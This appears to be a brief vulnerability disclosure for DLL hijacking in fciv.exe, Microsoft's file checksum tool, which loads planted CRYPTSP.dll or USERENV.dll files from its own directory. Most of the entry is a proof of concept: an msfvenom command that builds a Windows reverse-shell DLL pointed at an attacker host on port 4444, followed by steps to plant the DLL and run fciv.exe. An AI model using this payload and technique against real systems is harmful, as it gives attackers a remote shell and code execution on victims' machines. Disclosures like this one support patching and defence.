
file checsum with a process fciv.exe
will load and execute malicious Dynamic Link Libraries {DLL} while using the following vulnerable names :
CRYPTSP.dll
USERENV.dll
the process of exploitation occurs while placing these remade dll files in the same directory of FCIV
.
so if an attacker is able to place one of these Vulnerable DLL , the execution of file verification will load these malicious dll directly .
POC
- Generate reverse shell tcp payload using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=attackerip LPORT=4444 -f dll > /root/CRYPTSP.dll
- Place DLL file on the same directory of fciv executable
- execute fciv.exe with malicious dll file
fciv.exe CRYPTSP.dll
Reference